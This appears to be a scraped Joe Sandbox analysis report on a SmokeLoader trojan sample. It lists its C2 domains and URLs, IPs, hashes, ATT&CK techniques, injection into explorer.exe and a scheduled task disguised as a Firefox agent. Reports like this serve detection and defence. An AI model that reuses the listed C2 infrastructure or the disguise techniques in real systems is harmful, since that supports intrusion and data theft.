      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: GetLocaleInfoA,7_2_0040F4CC
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_004029B0 GetNumberFormatW,GetTimeFormatW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,CreateNamedPipeA,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsSetValue,SetEnvironmentVariableA,GetTimeFormatW,GetModuleFileNameW,7_2_004029B0
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00408071 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00408071
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,7_2_00402780

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		33
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		12
      Virtualization/Sandbox Evasion      		LSASS Memory521
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)33
      Process Injection      		Security Account Manager12
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive112
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories      		NTDS3
      Process Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing      		Cached Domain Credentials2
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync114
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541371 Sample: kGSZ4dCqYh.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 23 volisc.biz 2->23 25 tnc-corp.ru 2->25 27 2 other IPs or domains 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 7 kGSZ4dCqYh.exe 2->7         started        10 dvjdfvr 2->10         started        12 dvjdfvr 2->12         started        signatures3 process4 signatures5 49 Detected unpacking (changes PE section rights) 7->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->51 53 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->53 61 4 other signatures 7->61 14 explorer.exe 61 3 7->14 injected 55 Antivirus detection for dropped file 10->55 57 Multi AV Scanner detection for dropped file 10->57 59 Machine Learning detection for dropped file 10->59 process6 dnsIp7 29 tnc-corp.ru 189.164.127.217, 49736, 50003, 50004 UninetSAdeCVMX Mexico 14->29 31 201.124.145.196, 58683, 58684, 58685 UninetSAdeCVMX Mexico 14->31 19 C:\Users\user\AppData\Roaming\dvjdfvr, PE32 14->19 dropped 21 C:\Users\user\...\dvjdfvr:Zone.Identifier, ASCII 14->21 dropped 33 System process connects to network (likely due to code injection or exploit) 14->33 35 Benign windows process drops PE files 14->35 37 Deletes itself after installation 14->37 39 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->39 file8 signatures9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      kGSZ4dCqYh.exe39%ReversingLabsWin32.Dropper.Generic
      kGSZ4dCqYh.exe100%AviraHEUR/AGEN.1306978
      kGSZ4dCqYh.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\dvjdfvr100%AviraHEUR/AGEN.1306978
      C:\Users\user\AppData\Roaming\dvjdfvr100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\dvjdfvr39%ReversingLabsWin32.Trojan.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://aka.ms/odirmr0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
      https://api.msn.com/q0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://wns.windows.com/L0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
      https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://outlook.com_0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      tnc-corp.ru
      		189.164.127.217
      		truetrue
        		unknown
        volisc.biz
        		unknown
        		unknowntrue
          		unknown
          liverds.at
          		unknown
          		unknowntrue
            		unknown
            livbev.online
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://volisc.biz/tmp/index.phptrue
                		unknown
                http://livbev.online/tmp/index.phptrue
                  		unknown
                  http://liverds.at/tmp/index.phptrue
                    		unknown
                    http://tnc-corp.ru/tmp/index.phptrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://excel.office.comexplorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.microexplorer.exe, 00000001.00000000.1845946637.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1844459297.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1845010581.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://api.msn.com/qexplorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1847015156.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1847015156.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1847015156.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://word.office.comexplorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.msn.com/explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://outlook.com_explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      201.124.145.196
                                                      		unknownMexico
                                                      		8151UninetSAdeCVMXtrue
                                                      189.164.127.217
                                                      		tnc-corp.ruMexico
                                                      		8151UninetSAdeCVMXtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1541371
                                                      Start date and time:2024-10-24 18:36:08 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 3s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:kGSZ4dCqYh.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:bab1912f10355b913050217669acc322.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@3/2@83/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 30
                                                      • Number of non-executed functions: 19
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.2, 40.126.31.67, 40.126.31.71, 20.190.159.0, 40.126.31.69, 20.190.159.4, 20.190.159.71, 20.190.159.75
                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: kGSZ4dCqYh.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      12:37:33API Interceptor455513x Sleep call for process: explorer.exe modified
                                                      17:37:35Task SchedulerRun new task: Firefox Default Browser Agent D2CFCEFC1E900624 path: C:\Users\user\AppData\Roaming\dvjdfvr

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      tnc-corp.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 200.45.93.45
                                                      fCyPLsvl8A.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 212.112.110.243
                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 186.10.35.76
                                                      KmVfT4SeZB.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 109.175.29.39
                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 92.36.226.66
                                                      setup3.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 151.233.51.166
                                                      2Qvkmk7HGr.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 211.171.233.126
                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 187.204.28.205
                                                      Ypp1MuoIa1.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 190.220.21.28
                                                      5iwz8543Xc.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 190.146.112.188

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      UninetSAdeCVMXkeldRUiaay.elfGet hashmaliciousMiraiBrowse
                                                      • 189.189.133.229
                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 189.176.110.248
                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 201.129.155.182
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                      • 201.135.33.67
                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 187.222.95.97
                                                      botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 201.111.54.93
                                                      botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 189.158.101.27
                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 187.141.238.128
                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 189.157.241.183
                                                      na.elfGet hashmaliciousUnknownBrowse
                                                      • 187.171.251.143
                                                      UninetSAdeCVMXkeldRUiaay.elfGet hashmaliciousMiraiBrowse
                                                      • 189.189.133.229
                                                      powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 189.176.110.248
                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 201.129.155.182
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                      • 201.135.33.67
                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 187.222.95.97
                                                      botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 201.111.54.93
                                                      botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 189.158.101.27
                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 187.141.238.128
                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 189.157.241.183
                                                      na.elfGet hashmaliciousUnknownBrowse
                                                      • 187.171.251.143

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Roaming\dvjdfvr

                                                      Download File
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):399360
                                                      Entropy (8bit):6.446097347649339
                                                      Encrypted:false
                                                      SSDEEP:6144:StLH/6zftGuIHMvxZ8NQhrOjAx99iqyyvw9R81aPFhbpxA5HcH/kWTW:SqfIu2GmOssxyyIL81aPFhtGuj
                                                      MD5:BAB1912F10355B913050217669ACC322
                                                      SHA1:17848E8AA5E443C06D495C500E642BE0967CABE6
                                                      SHA-256:38DC7521A2E99FB4C095F74B51DADF8B10FDF680ECBCECB419E6720E8151096D
                                                      SHA-512:A96A1B0190A97E1D61AE00D82E85AB720A80C976D0F450EEAA4A9237EA337DC674746E23C458AA3023044CB7F9B6AD9D39A73C4401875876192D14FC437D012A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L....z.d.................r...\.......:............@.................................=.......................................tw..<.......X+......................H....................................&..@............................................text....p.......r.................. ..`.data...\........`...v..............@....rsrc...X+.......,..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\dvjdfvr:Zone.Identifier

                                                      Download File
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
